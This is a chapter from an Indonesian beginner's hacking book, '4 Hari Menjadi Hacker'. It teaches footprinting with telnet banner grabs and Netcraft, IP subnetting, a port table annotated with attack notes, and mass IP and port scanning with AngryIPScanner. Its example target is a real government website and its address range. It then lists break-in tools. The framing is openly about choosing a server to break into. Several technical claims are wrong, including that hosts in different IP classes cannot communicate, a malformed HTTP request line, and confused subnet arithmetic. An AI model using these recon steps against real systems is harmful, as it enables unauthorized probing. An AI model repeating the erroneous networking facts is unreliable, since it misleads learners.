Anda di halaman 1dari 158

4 HARI MENJADI HACKER

HARI PERTAMA

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 1


4 HARI MENJADI HACKER

BAB I

Hari Pertama

SEKURITI DILIHAT DARI SUDUT


PANDANG SEORANG MALING DAN
SEORANG HACKER

Sekuriti atau security yang jelas adalah sebuah


kata yang penting bila dilihat dari sudut pandang seorang
hacker. Bisa diandaikan kita mempunyai sebuah rumah,
rumah tersebut jika tidak dilengkapi dengan sistem
keamanan yang modern atau bahkan sistem keamanan
yang sederhana, maka rumah kita bisa diporak
porandakan oleh orang lain. Atau bisa dimasuki bahkan
diambil alih orang lain. Diambil alih maksudnya, misalnya
seseorang menemukan laci yang berisi perhiasan atau
surat – surat berharga, seperti surat tanah atau surat –
surat hukum lainnya, jika seseorang itu tidak bertanggung
jawab, bisa saja surat tanah dan surat berharga kita
dicuri, kemudian si pencuri memodifikasi surat tersebut
sedemikian rupa, sehingga seakan – akan surat tanah tadi
adalah atas nama si pencuri tersebut.
Jika diimplementasikan ke keamanan atau
sekuriti jaringan, rumah tersebut adalah server kita, si
pencuri adalah cracker atau pihak yang tidak bertanggung
jawab dan surat berharga itu sendiri adalah file user dan
password untuk mengakses server yang kita miliki.

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 2


4 HARI MENJADI HACKER

Apabila rumah tadi memiliki sistem keamanan yang


memadai seperti pintu ada kuncinya, atau ada alarm
pendeteksi pencuri dan mempunyai pagar untuk
mencegah orang langsung masuk ke sana, maka kejadian
kecurian surat berharga bisa dicegah. Demikian pula bila
sebuah server mempunyai sebuah sistem keamanan yang
canggih dan teruji, otomatis kejadian kecurian password,
defacing (penggantian halaman web oleh cracker) dan
internet abusing (penyalah gunaan internet) dapat
dicegah.
Sebagai seorang yang ingin belajar security atau
keamanan internet dan server, mau tidak mau kita harus
mengetahui apa saja sih yang dilakukan oleh para cracker
atau penyerang di internet sehingga dia bisa masuk dan
mencuri file user password di server kita, agar kita dapat
memahami dan mencegah kejadian tersebut. Nah untuk
mengetahui itu, mari kita baca sub bab selanjutnya, yaitu
anatomi hacking:

1. ANATOMI HACKING

1.1 Footprinting

Untuk dapat mendekati orang yang kita sukai, ada


beberapa hal yang harus diperhatikan, yaitu,
mendapatkan informasi tentang dia:
1. hobinya apa
2. makanan kesukaannya apa

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 3


4 HARI MENJADI HACKER

3. nama lengkapnya siapa


4. keluarganya siapa saja
5. dan lain sebagainya.

Sama seperti server, jika kita ingin memasuki suatu


server, kita harus mengumpulkan segala informasi
tentang server tersebut, yaitu:

1. Sistem Operasi apa yang dipakai


2. IP Address dari server tersebut
3. Port berapa yang terbuka
4. Aplikasi apa saja yang digunakan di server target

Hal itulah yang dinamakan footprinting, jadi definisi


footprinting sebenarnya adalah mencari segala informasi
tentang server atau target serangan. Proses footprinting
terbagi dua yaitu:

1. Inner footprinting
2. Outer footprinting

Inner footprinting

Inner footprinting adalah mencari informasi server


dimana kita sudah berada di dalam jaringan server target.
Misalnya server target anda adalah kampus A yang
mempunyai hotspot di area kampus. Otomatis anda tidak
perlu mencari informasi tentang sistem operasi dan server
kampus A melalui internet, tapi cukup membawa laptop

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 4


4 HARI MENJADI HACKER

dan melakukan koneksi lewat hotspot kampus A. Untuk


melakukan Inner footprinting hanya dapat dilakukan
melalui DOS (Diskette Operating System) Mode. Ikuti
langkah berikut:

1. Buka DOS shell dengan klik start-> run dan ketik


‘cmd’ (tanpa tanda petik) untuk windows xp dan
‘command’ jika anda masih memakai system
operasi Windows 98. Kemudian tekan tombol
Enter.

Gambar 1. 1 Kotak Run

2. Maka akan muncul gambar DOS shell sbb:

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 5


4 HARI MENJADI HACKER

Gambar 1. 2 DOS Shell

3. Untuk tahu sebuah server memakai system


operasi apa, kita akan memakai telnet sebagai
media koneksinya, telnet sebenarnya digunakan
untuk para system administrator untuk
mengendalikan perintah dari jarak jauh. Ketik
‘telnet’ tanpa tanda petik, kemudian tekan enter.
Maka akan muncul seperti pada gambar berikut :

Gambar 1. 3 Telnet Console

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 6


4 HARI MENJADI HACKER

4. Ketik ‘set localecho’ (tanpa tanda petik) untuk


menampilkan hasil koneksi dari telnet. Bila kita
tidak mengetik perintah ini terlebih dahulu, maka
server yang kita hubungi melalui telnet tidak akan
memunculkan local echo, atau perintah yang
telah kita ketik. Hal ini dapat mempersulit apakah
kita mengetik suatu perintah salah atau tidak.

Gambar 1. 4 Mengeset Localecho agar kelihatan


mengetikkan perintah yang salah atau tidak

5. kemudian ketik:
open namaservertarget port

atau misalnya server target kita adalah 202.169.224.3,


dari mana angka tersebut, dari properties yang ada di
koneksi WLAN kita, cukup klik 2x gambar yang ada di
taskbar sebelah kanan bawah :

Klik disini

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 7


4 HARI MENJADI HACKER

Gambar 1. 5 Icon WLAN yang diklik

Maka akan muncul Kotak Network Connection Details,


properties dari koneksi WLAN kita, kemudian pilih taskbar
support dan klik tombol details , maka
akan muncul gateway yang ingin kita cari informasi soal
Sistem Operasinya:

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 8


4 HARI MENJADI HACKER

Gambar 1. 6 Kotak Network Connection Details, berisi


seluruh informasi ttg jaringan

Kelihatan bukan, setelah itu mari kita masuk ke langkah


6.

6. Pada mode dos tadi ketik


open 202.169.224.3 80

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 9


4 HARI MENJADI HACKER

Kemudian tekan enter

Gambar 1. 7 Melakukan Koneksi dengan Telnet

7. Setelah muncul gambar seperti di atas, ketik:


Get /index.htm http\1.0

Kemudian tekan enter 2x

8. Maka akan muncul di DOS shell gambar seperti


berikut :

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 10


4 HARI MENJADI HACKER

Gambar 1. 8 Hasil perintah GET untuk menggali


informasi sebuah server

9. Pada dos shell ada keterangan sbb :

Date: Sun, 08 Oct 2006 18:12:00


GMT
Server: Apache/2.2.2 (Fedora)

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 11


4 HARI MENJADI HACKER

Allow:
GET,HEAD,POST,OPTIONS,TRACE
Content-Length: 295
Connection: close
Content-Type: text/html;
charset=iso-8859-1

Pada baris server ada keterangan


Server: Apache/2.2.2 (Fedora)

Dapat dipastikan bahwa server memakai Sistem Operasi


Linux Fedora dan web server Apache v2.2.2. Jika pada
keterangan tersebut muncul tulisan MS Windows 2000
atau keterangan lainnya maka server memakai Sistem
Operasi Windows.

Outer footprinting

Outer Footprinting dilakukan dimana posisi kita tidak


tersambung atau terkoneksi pada jaringan di dalam
server, misalnya, kita diwarnet dan server target kita
berada di lain tempat, untuk itu kita harus melakukan
Outer Footprinting. Caranya sbb:

1. Buka Web browser, bebas anda ingin memakai


Internet Explorer, Mozilla, atau Opera.
2. Kemudian masuk ke situs www.netcraft.com

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 12


4 HARI MENJADI HACKER

Gambar 1. 9 Website Netcraft

3. kemudian lihat di sebelah kiri atas anda

Gambar 1. 10 Kotak pencari informasi server pada


netcraft

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 13


4 HARI MENJADI HACKER

4. Ketik di textbox tersebut, situs yang ingin anda


gali informasinya, misalnya kita ingin menggali
informasi soal situs www.indonesia.go.id , maka
ketik nama situs tersebut ke dalam textbox,
kemudian tekan enter.

Gambar 1. 11 Menuliskan situs yang ingin digali informasi


servernya

5. Dari sini anda akan mendapat informasi banyak


sekali seperti :
- Site
- Domain
- IP Address
- Negara
- Tanggal pertama kali dilihat
- Domain Registry
- Operating System

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 14


4 HARI MENJADI HACKER

- Webserver
- Tanggal terakhir site diupdate
- Dan lain lain

Gambar 1. 12 Report 1 ttg situs yang digali

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 15


4 HARI MENJADI HACKER

Gambar 1. 13 Report 2 ttg situs yang digali

Gambar 1. 14 Report 3 ttg situs yang digali

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 16


4 HARI MENJADI HACKER

Gambar 1. 15 Report 4 ttg yang digali

1.2 Scanning

Scanning adalah proses pencarian IP Address dan port


yang terbuka pada suatu situs. Pencarian informasi ini
sangat penting karena berkaitan dengan celah keamanan
yang akan kita gali dari suatu situs. Jadi mau tidak mau
anda harus mengerti apa itu yang dinamakan IP Address
dan Apa yang dinamakan dengan Port.

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 17


4 HARI MENJADI HACKER

IP ADDRESS

Apa yang dimaksud dengan IP Adress? Ip adress adalah


alamat sebuah host atau komputer contohnya seperti
192.168.17.88 atau 10.10.1.42. Agar IP adress pada
komputer tidak simpang siur maka IP address dibagi
beberapa kelas, yaitu :

Class IP Network Host Jumlah Jumlah


ID ID jaringan jaringan
per Host
A 1-126 w x.y.z 126 16777214

B 128- w.x y.z 16384 65534


191
C 192- w.x.y z 2097152 254
223
D 224- Kebalikan N/A N/A N/A
239 dari
Multicast
Addressing
E 240- Kebalikan N/A N/A N/A
254 dari
Multicast
Addressing
Tabel 1.1 Pengelompokan IP Addres

Tiap-tiap IP adress hanya bisa berhubungan jika mereka


berada di satu class. Komputer yang punya IP kelas A
tidak bisa berhubungan dengan komputer yang

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 18


4 HARI MENJADI HACKER

mempunyai kelas B. Begitu juga sebaliknya. Gak


Mudeng…OK kita jelaskan jika komputer A mempunyai IP
address 192.168.17.3, komputer B juga mempunyai IP
address 192.168.19.3 dan Komputer C mempunyai
192.168.17.20. maka komputer mana yang dapat
berhubungan? Ya bener komputer A dan Komputer C.
kenapa? Karena mereka mempunyai network ID yang
sama tetapi Host ID nya beda. Sedangkan Komputer B
mempunyai Network ID dan Host ID berbeda.
Lalu apa yang dimaksud Host ID dan Network ID?
Misalnya kita ambil contoh ip address 192.168.17.3 maka
keterangan dari tiap-tiap angka adalah sebagai berikut :

192.168.17.3
W X Y Z

Seperti pada tabel di atas IP 192.168.17.3 adalah class C,


maka w.x.y adalah network ID dan z adalah host ID. Agar
komputer satu dan lainnya dapat berhubungan maka
harus mempunyai Network ID yang sama dan Host ID
yang berbeda.

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 19


4 HARI MENJADI HACKER

Subnetting

Di tiap perusahaan yang mempunyai jaringan


pasti memiliki komputer lebih dari satu mungkin 100 atau
200 komputer. Agar Komputer tersebut dapat
berhubungan dengan lancar maka harus kita harus
menggunakan subnetting. Fungsi dari subnetting ini
yaitu:

- Mengurangi lalu-lintas jaringan, sehingga


data yang lewat di perusahaan tidak akan
bertabrakan (collision) atau macet.
- Teroptimasinya unjuk kerja jaringan
- Pengelolaan yang disederhanakan
- Membantu pengembangan jaringan ke
arah jarak geografis yang menjauh,
contoh WAN yang menggunakan
jaringan antar kota yang berbeda.
Tabel Subnet :

Class Subnet Mask Default

A 255.0.0.0

B 255.255.0.0

C 255.255.255.0

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 20


4 HARI MENJADI HACKER

Untuk IP adress kelas A tidak dapat memakai


subnet kelas B demikian pula sebaliknya. Jika kalian
pernah menemukan istilah 255.0.0.0/8 maksud dari istilah
tersebut adalah, subnet mask 255.0.0.0 mempunyai bit
yang aktif (angka 1) sebanyak 8. Angka 8 setelah karakter
‘/’ menunjukkan banyaknya angka 1. Sebenarnya subnet
mask terdiri dari bilangan – bilangan biner, misalnya
255.0.0.0 jika dikonversi ke biner maka menjadi
11111111.00000000.00000000.00000000. Oleh karena
itu penulisannya menjadi 255.0.0.0/8. Contoh lainnya
adalah 255.255.255.224/27 jika dikonversi ke biner maka
akan menjadi
11111111.11111111.11111111.11100000.

Melakukan Subnetting

Untuk melakukan subnetting terdiri dari beberapa proses,


yaitu:

1. Menentukan jumlah subnet yang


dihasilkan oleh subnet mask

Yaitu dengan cara memakai rumus 2x – 2 = jumlah


subnet, x adalah bit 1 pada subnet mask. Misalnya
11000000, maka x adalah 2 (dilihat dari jumlah angka 1
yang ada di situ), 22 – 2 = 2 subnet.

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 21


4 HARI MENJADI HACKER

2. Menentukan jumlah host per subnet

Yaitu dengan memakai rumus 2y – 2 = jumlah host per


subnet, y adalah jumlah bit dibagian host atau yang
bernilai nol ‘0’. Misalnya 11000000, maka y adalah 6
(dilihat dari angka 0 yang ada disitu), 26 – 2 = 62 host

3. Menentukan subnet yang valid

Yaitu dengan mengurangi 256 dengan angka yang ada


dibelakang subnet mask, misalnya 255.255.255.224/27,
maka untuk menentukan subnet yang valid 256 – 224 =
32. Hasil dari pengurangan ditambahkan dengan bilangan
itu sendiri sampai berjumlah sama dengan angka
belakang subnet mask. 32 + 32 =64, 64 + 32 = 96, 96 +
32 = 128, 128 + 32 = 160, 160 + 32 = 192, 192 + 32 =
224. maka jumlah host yang valid adalah 32, 64, 96, 128,
160, 192.

4. Menentukan alamat broadcast untuk tiap


subnet

Yaitu mengambil alamat ip address yang terletak paling


akhir

5. Menetukan host-host yang valid untuk tiap


subnet

Yaitu mengambil nomor diantara subnet-subnet dengan


menghilangkan angka 0 dan angka 1.

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 22


4 HARI MENJADI HACKER

Contoh Kasus

Misalnya 255.255.255.192/26, kita akan melakukan


subnetting IP address 192.168.10.0. Maka langkah yang
harus dilakukan.
Alamat network : 192.168.10.0
Subnet mask : 255.255.255.192

1. Menentukan subnet yang dihasilkan subnet


mask

Konversi 192 ke biner yaitu 11000000. Ambil jumlah


angka 1 untuk menentukan x, sehingga x = 2. pakai
rumus 2x – 2 = jumlah subnet, sehingga 22 – 2 = 2.

2. Menentukan jumlah host

Ambil jumlah angka 0 dari konversi 192 untuk memberi


nilai y. 11000000. Sehingga y = 6. Pakai rumus 2x – 2 =
jumlah host, maka 26 – 2 = 62.

3. Menentukan subnet yang valid.

Kurangi 256 dengan 192, 256 – 192 = 64. Tambahkan 64


sampai sejumlah 192. 64 + 64 = 128, 128 + 64 = 192.
Maka subnet yang valid 64, 128

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 23


4 HARI MENJADI HACKER

4. Menentukan broadcast

Terletak tepat sebelum subnet berikutnya yaitu 127 dan


191

5. Menentukan host yang valid

Dapat dilihat keterangannya di tabel berikut

Nama Host I Host II IP address asli Host I IP address asli Host II

Subnet 64 128 - -

Host Pertama

65 129 192.168.10.65 192.168.10.129

Host terakhir

126 190 192.168.10.126 192.168.10.190

Alamat Broadcast

127 191 - -

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 24


4 HARI MENJADI HACKER

Nah dilihat ditabel ini kita dapat menghitung


berapa jumlah host nya yaitu (126-65) + (190-129) =
122 host dalam 1 jaringan tersebut.

Port
Port dalam arti bahasa Indonesianya adalah
lubang. Tetapi kalau dalam komputer port diasumsikan
sebagai pintu service. Misalnya di komputer A membuka
port 21, maka kita tahu bahwa komputer A membuka diri
untuk sebuah pelayanan ftp (file transfer protocol. Berikut
ini adalah daftar standar untuk port :

Tabel 1.2 Pengelompokan Port Komputer, sumber


http://www.kecoak.or.id
No Protokol Label Nama Keterang
Port Port an
19 tcp/udp chargen Character Generator
karakter ini
Generation mengembalik
an deretan
karakter-
karakter.
Walaupun
sebagian
besar layanan
yang ada
sekarang
terbatas ke
512 byte,
namun bisa
dijumpai

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 25


4 HARI MENJADI HACKER

server yang
mengirimkan
karakter
secara terus
menerus
sampai
hubungan ke
port ini
diputuskan.
Seringkali di
server-server
lama, jika
jumlah klien
yang
membuka
hubungan
mencapai nilai
ratusan
secara
sekaligus,
CPU time
akan
terkonsumsi
secara besar-
besaran,
mebuat sang
server
merangkak.
Serangan tipe
Denial of
Service paling
sederhana
adalah
dengan me-
redireksi
keluaran port
19 ke port lain
(mentargetka
n mesin-
mesin
Windows NT)

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 26


4 HARI MENJADI HACKER

20/21 tcp ftp File Protokol untuk


menangani
Transfer pentransferan
Protocol file(-file) dari
satu komputer
ke komputer
lainnya.
Protokol ini
menggunakan
dua saluran,
yang satu
sebagai
saluran untuk
mengendalika
n lalulintas
data,
sedangkan
yang satunya
lagi untuk
dilintasi oleh
data itu
sendiri.
Proses
autentifikasi
berdasar
login/passwor
d. FTP adalah
metode paling
sering
digunakan di
situs-situs
web untuk
mengirim file
(seringkali
akses 'ftp
only' diberikan
kepada para
pelanggan
webhosting).
Siapapun
yang berhasil
login akan

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 27


4 HARI MENJADI HACKER

diberikan hak
yang sama
berdasar id
(jadi boleh
menulis ke
direktori
'home' milik
user tsb), atau
bahkan di
banyak
server, boleh
membaca /
tulis direktori
milik
pengguna
lain. Eksploit-
eksploit yang
beredar
termasuk
untuk
program-
program
wu_ftpd,
ncftpd,
ftpbounce, dll.
23 tcp telnet Telnet Metode login
jarak jauh
yang paling
populer.
Walaupun
tidak seaman
ssh (data
yang melintasi
tidak
dienkripsi
secara
otomatis),
masih terlalu
banyak
server-server
yang
mengizinkan

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 28


4 HARI MENJADI HACKER

login jarak
jauh langsung
tipe ini
(sebagian
besar UNIX,
beberapa
VMS). Metode
ini pulalah
yang paling
sering
diserang oleh
chracker-
chracker,
terkadang
dengan se-
membabibuta
mengetikkan
root/daemon/
dll, dan
mencobakan
password-
password
default.
Seringkali
mesin-mesin
yang
sebenarnya
tidak
berfungsi
melayanin
user (seperti
dns,
webserver,
etc)
menjalankan
fungsi ini
walaupun
sebetulnya,
tidak begitu
diperlukan.

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 29


4 HARI MENJADI HACKER

25 tcp mail Simple Protokol


pentransferan
Mail pesan
Transfer sederhana,
adalah
standar de
facto untuk
internet.
Termasuk
salah satu
port yang
dijadikan
sasaran
eksploit-
eksploit,
yang berjuml
ah sampai
puluhan
saking
populernya.
Karena
protokol ini
memerlukan
akses
berprivilese
tinggi
(seringkali
setara
root/admin)
supaya bisa
menulis ke
direktori milik
user manapun
juga.
Sebaiknya
dihilangkan
bagi mesin-
mesin yang
tidak begitu
memerlukann
ya.

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 30


4 HARI MENJADI HACKER

48 tcp/udp auditd Digital Digunakan


oleh daemon
Audit audit
Daemon komputer-
komputer
Digital untuk
menjalankan
tugas-tugas
administrasi.
Banyak sniffer
yang
mentargetkan
port ini.
53 tcp/udp dns Domain salah satu
layanan yang
Name cukup vital,
Server dijalankan di
server-server,
berfungsi
untuk
memberikan
informasi
berbentuk
alamat IP
xxx.xxx.xxx.xx
x untuk setiap
permintaan
penterjemaha
n dari nama-
nama domain.
Eksploit
nameserver
bisa dicari di
internet atau
di arsip
kecoak.
79 tcp finger Finger daemon yang
bertugas
Daemon memberikan
informasi
mengenai
pengguna-

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 31


4 HARI MENJADI HACKER

pengguna
suatu sistem
kepada sang
peminta
(seringkali
siapa saja).
Pada versi-
versi lama
Unix,
perintah:
finger
user@host1
@host2@etc
...(termas
uk
firewall)
menjadikan
sang peminta
lebih
anonimus
sebab
user@host1
akan melihat
bahwa
peminta
berasal dari
host2 atau
bahkan
firewall.

80/ tcp http WWW, H Protokol


pentransferan
8000/ yperText data
8080/ Transfer berformat
dll Protocol HTML
(webpage-
webpage)
lainnya dari
server kepada
publik. Port ini
sangat
populer

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 32


4 HARI MENJADI HACKER

dijadikan
sasaran para
chracker
(terutama
ditargetkan
oleh program-
program
pelacak
kelemahan
CGI), sebab
banyak
program CGI
yang bisa
dieksploit.
Mesin-mesin
yang
menyediakan
servis
'Frontpage
Extensions'
secara default
terkenal
berlobang
besar, dan di-
'patch'. Ada
juga serangan
dari
pengunjung
yang
mencoba
mengakses
direktori-
direktori yang
terlindung
password
(contohnya di
situs-situs
porno)
dengan cara
mem-brute
force proses
otentifikasi

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 33


4 HARI MENJADI HACKER

(UserID dan
Password),
sebab
serangan
semacam ini
tidak direkam
oleh log
server.
110 tcp/udp pop3 Post Office Protokol
standar
Protocol v3 pemeriksaan
email jarak
jauh.
Biasanya user
(atau program
e-mail client
user) melog-
on untuk
memeriksa
dan
mengambil
pesan email
yang diterima
lewat mailbox
server.
Hilangkan jika
anda tidak
membutuhkan
layanan ini
pada suatu
server.
Protokol ini
mengizinkan
siapapun
untuk
memasukkan
kombinasi
(lewat skrip)
user+passwor
d secara
'brute force'

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 34


4 HARI MENJADI HACKER

tanpa
mencatat log.
111 tcp/udp sunrpc Sun Beberapa
portscanner
Remote mentargetkan
Procedure port ini, dan
Call terdapat
beberapa
program yang
mengeksploit
port ini
(mesin-mesin
Sun/Solaris).
139 tcp/udp netbios- NetBIOS Port inilah
yang
ssn Session biasanya
Service digunakan
sebagai
sarana
komunikasi
dengan atau
antara mesin-
mesin
Microsoft
(NT/95/98).
Penyerang
seringkali
mentargetkan
'shared
device' yang
bisa diakses
lewat internet.
Juga terdapat
banyak
program
'nuker' yang
men-denial-
of-service-kan
mesin-mesin
Windows via
port 139.
Selain di

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 35


4 HARI MENJADI HACKER

mesin-mesin
NT, mesin-
mesin Unix
juga
menjalankan
servis di port
ini, yaitu
Samba, yang
memberikan
kemudahan
bernetwork
antara mesin
platform Unix
dengan mesin
Windows.
Jalankan
ADMSMB
scan atau
eksploit untuk
memeriksa
vulnerabilitas.
143 tcp/udp imap2 Interactive Protokol
pengaksesan
Mail e-mail
Access lainnya.
Protocol Seringkali
berjalan tanpa
diperlukan.
Mesin-mesin
UNIX
(terutama
Linux) yang
menjalankan
imap instalasi
default
terbuka
terhadap
serangan
yang bisa
berakibat
pemberian
privilese root

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 36


4 HARI MENJADI HACKER

kepada sang
chracker.
443 tcp https Hypertext Daemon
penerima
Transfer permintaan
Protocol- tipe http yang
Secure berjalan
diatas 'secure
layer'
(terenkripsi).
Lihat
keterangan
untuk port 80
diatas.
512 tcp exec Remote Mengizinkan
eksekusi
Process proses jarak
Execution jauh dengan
sistem
autentifikasi
berdasar file
/etc/passwd.
513 tcp rlogin Remote Port inilah
yang
Login digunakan jika
Protocol anda
melakukan
'rlogin' ke
suatu host.
Dengan
rlogin, user di
host A tidak
perlu
melewati
proses login
lewat telnet ke
host B seperti
biasa, namun
bisa langsung
masuk ke
home
directorynya

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 37


4 HARI MENJADI HACKER

di host B
(tanpa
password).
Jika seorang
chracker
berhasil
menjebol root
di salah satu
host, rlogin
adalah sarana
paling cocok
untuk
digunakan
'meloncat' ke
host lain
dalam
network yang
sama dan
mengambil
alih kontrol.

Proses Scanning IP Address

Tools yang dipakai untuk scanning adalah


AngryIpScanner atau NMAP. Penggunaannya berbeda,
untuk AngryIpScanner dapat dilakukan di windows mode
atau GUI (Graphical User Interface), sedangkan NMAP
harus dilakukan di dalam Mode Dos. Kali ini kita akan
memakai AngryIpScanner untuk tools nya. Ikuti langkah
berikut:

1. Download AngryIpScanner di
www.angryziber.com/ipscan/

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 38


4 HARI MENJADI HACKER

2. Kemudian lakukan ping ke server target, misalnya


targetnya www.indonesia.go.id maka lakukan
ping ke situs tersebut dengan membuka DOS
shell terlebih dahulu, kemudian ketik perintah
‘ping www.indonesia.go.id’ (tanpa tanda petik),
maka akan muncul seperti pada gambar berikut:

Gambar 1. 16 Ping ke situs target

3. Dari informasi tersebut kita bisa mendapatkan IP


Address dari www.indonesia.go.id , yaitu pada
baris:

Pinging www.indonesia.go.id
[203.130.230.3]

4. Buka angryIPScanner

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 39


4 HARI MENJADI HACKER

Gambar 1. 17 Software AngryIPScanner untuk mencari IP


Address

5. Kemudian isi IP Range nya sesuai IP Address


yang dituju dengan acuan seperti contoh berikut,
misalnya IP Address yang ingin kita cari di kelas
C yaitu 203.130.230.3, maka cari IP range
tersebut dengan mengganti angka paling
belakang menjadi 203.130.230.0 (range
pertama) dan 203.130.230.255 (range terakhir)
dan klik START untuk memulai pencarian.

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 40


4 HARI MENJADI HACKER

Gambar 1. 18 AngryIPScanner sedang mencari IP


Address yang sedang aktif

6. Untuk melihat hasilnya tinggal, klik Kolom Ping


yang ada di kotak result, maka hasil tersebut
akan tersusun sendiri, sesuai dengan urutan IP
Paling kecil yang hidup

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 41


4 HARI MENJADI HACKER

Gambar 1. 19 Indikator pada AngryIPScanner untuk


mengetahui IP Address yang aktif

Pada software angryIPscanner ada indikator


lampu biru dan lampu merah . Lampu biru
menunjukkan indikator bahwa komputer atau server
tersebut sedang menyala dan yang merah
mengindikasikan bahwa IP Address tidak ada atau
komputer server dengan IP Address tersebut sedang
mati.

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 42


4 HARI MENJADI HACKER

Proses Scanning Port untuk Server yang Hidup

Jika anda sudah menemukan IP Address atau


server mana saja yang telah hidup, maka langkah
selanjutnya adalah melakukan pemindaian port atau
scanning port. Maksud scanning atau pencarian port
yang terbuka disini berguna untuk menentukan darimana
kita akan masuk dan melakukan ekploitasi ke server
tersebut. Bisa dimisalkan dengan, kita sudah
mendapatkan rumah untuk kita curi barang –barang di
dalamnya, Agar dapat masuk ke rumah tersebut, kita
harus menentukan darimana kita akan masuk ke rumah
tersebut, apakah dari jendela dengan cara
mencongkelnya, atau dari pintu belakang dengan cara
menghancurkan gembok atau kunci dengan
menggunakan linggis. Implementasi di tutorial hacking ini
adalah misalnya kita telah mengetahui port yang terbuka
adalah port 80 atau port HTTP, maka untuk masuk lewat
port 80 kita harus menggunakan tehnik ekploitasi HTTP.
Untuk mencari port ikuti langkah berikut :

1. Buka Software AngryIPScanner


2. Isi IP Range sesuai dengan IP Target yang akan
dicari

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 43


4 HARI MENJADI HACKER

Gambar 1. 20 Pengisian IP Address dengan range untuk


melakukan scanning massal

3. Klik Menu Options -> Select Port, maka akan


muncul windows seperti di bawah ini :

Gambar 1. 21 Pengisian port yang akan di-scan

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 44


4 HARI MENJADI HACKER

4. Isi port yang ingin di scan, misalnya port 80


(HTTP) dan 3306 (MySQL), jika yang ingin discan
lebih dari 1 port, gunakan pemisah tanda koma
untuk memisahkan port tersebut, misalnya port
80 (HTTP) dan 3306 (MySQL) maka penulisannya
sbb :

80,3306

Gambar 1. 22 Mengisi port 88 dan 3306 yang akan discan

5. Klik OK dan Klik Start untuk melakukan scanning


port

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 45


4 HARI MENJADI HACKER

Gambar 1. 23 Indikator untuk port yang terbuka

Dari hasil diatas dapat dilihat ada beberapa indikator


untuk scanning port, yaitu :

- Lampu Hijau yang mengindikasikan


server hidup dan port yang discan
terbuka atau ada.
- Lampu biru yang mengindikasikan
server hidup dan port yang discan tidak
terbuka atau tidak ada.
- Lampu merah yang mengindikasikan
server mati dan port yang discan tidak
terbuka atau tidak ada.

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 46


4 HARI MENJADI HACKER

1.3 Enumeration

Proses Enumeration adalah proses


penggabungan informasi yang telah kita dapat dari proses
sub bab sebelumnya sehingga menghasilkan eksploitasi
yang dapat digunakan. Misalnya dari informasi di atas kita
mendapat IP Address yang port 80 (HTTP) nya terbuka,
maka dari informasis di atas kita dapat mencari eksploitasi
untuk port 80. Atau pada proses tadi kita mendapatkan
informasi IP Address yang port 3306 (MySQL) terbuka,
maka kita tinggal mencari informasi tentang peng-
eksploitasian atau penyalahgunaan pada port 3306
tersebut. Cara pencarian banyak sekali, yaitu dengan
mengunjungi situs yang membahas celah keamanan
seperti :

www.securitytracker.com
www.windowssecurity.com
www.hackerhomepage.com

dan situs sekuriti atau hacking lainnya.

Atau cukup mencari informasi peng-eksplotasian lewat


www.google.co.id

1.4 Break-In

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 47


4 HARI MENJADI HACKER

Break-In adalah proses menjebol atau masuk ke


dalam server, dengan menggunakan eksploitasi atau
menggunakan password yang telah di crack. Biasanya
menggunakan tools tools eksploit yang telah dibuat oleh
programmer – programmer sekuriti untuk menembus
sistem tersebut. Tools – tools yang masih sering
digunakan adalah :

WINDOWS

- Kaht
- DCOM
- IIS Exploit
- SQL Injection Tools
- John The Ripper (Untuk melakukan
cracking password)

LINUX
- Exploit
- John The Ripper (Untuk Melakukan
Cracking Password)

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 48


4 HARI MENJADI HACKER

Bab II
Hari Pertama

PENCARIAN DAN PENELITIAN INFORMASI


SUATU SERVER

Informasi adalah sesuatu yang sangat penting.


Tanpa informasi kita tidak dapat melakukan break-in,
cracking password atau aktivitas hacking lainnya.
Beberapa informasi bisa didapat dengan cara teknis,
seperti melakukan pencurian file password untuk
mendapatkan informasi mengenai user dan password.
